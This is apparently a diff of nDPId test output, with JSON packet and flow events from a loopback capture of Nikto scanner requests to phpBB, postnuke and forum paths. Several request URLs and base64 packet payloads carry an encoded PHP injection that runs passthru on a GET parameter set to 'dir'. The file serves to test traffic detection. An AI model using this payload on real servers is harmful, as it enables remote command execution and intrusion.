00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277769,"pkt":"AAAAAAAAAAAAAAAACABFAAFl4jZAAEAGWVp\/AAABfwAAAcbMH5Dub9sXJ7s4LIAYAED\/WQAAAQEICp1m\/zGdZv8wR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} 
-01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277770,"pkt":"AAAAAAAAAAAAAAAACABFAAFjvxlAAEAGfHl\/AAABfwAAAcbOH5BOc4Y2FZ1LBYAYAED\/VwAAAQEICp1m\/zKdZv8yR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277772,"pkt":"AAAAAAAAAAAAAAAACABFAAFjEuZAAEAGKK1\/AAABfwAAAcbQH5A1ISvIAGoQJ4AYAED\/VwAAAQEICp1m\/zSdZv8zR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277773,"pkt":"AAAAAAAAAAAAAAAACABFAAFe9U5AAEAGRkl\/AAABfwAAAcbSH5CRq8xwNBHz4IAYAED\/UgAAAQEICp1m\/zWdZv81R0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277776,"pkt":"AAAAAAAAAAAAAAAACABFAAFnAwdAAEAGOIh\/AAABfwAAAcbUH5DtkDois29dAoAYAED\/WwAAAQEICp1m\/zidZv83R0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277777,"pkt":"AAAAAAAAAAAAAAAACABFAAFsiexAAEAGsZ1\/AAABfwAAAcbWH5BYorDPfm\/b94AYAED\/YAAAAQEICp1m\/zmdZv85R0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277778,"pkt":"AAAAAAAAAAAAAAAACABFAAFmIsJAAEAGGM5\/AAABfwAAAcbYH5ANfxvlV0uU+oAYAED\/WgAAAQEICp1m\/zqdZv86R0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
